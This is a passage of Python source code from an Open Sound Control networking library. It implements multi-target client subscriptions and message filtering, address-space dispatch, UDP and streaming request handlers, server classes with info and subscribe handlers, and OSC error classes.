self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if isinstance(filters,str):
(_, filters) = parseFilterStr(filters)
elif not isinstance(filters,dict):
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
elif (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in list(self.targets.items()):
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = list(out.values())
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in list(filters.keys()):
if filters['/*']:
out = msg
else:
out = None
elif False in list(filters.values()):
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in list(filters.keys()):
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = list(out.values())
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in list(self.targets.items()):
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return list(self.callbacks.keys())
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the receied message
- tags (string): The OSC-typetags of the receied message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in list(self.callbacks.keys()):
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-adresses
that have been registered to the server with a callback-function.
If the adress-pattern of the message machtes the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.socket = self.socket.dup()
client.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, client.sndbuf_size)
client._fd = client.socket.fileno()
client.server = self
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
if self.client != None:
self.client.close()
self.client = client
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in list(self.callbacks.keys()):
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (isinstance(item,int)) and not have_port:
url += ":%d" % item
have_port = True
elif isinstance(item,str):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
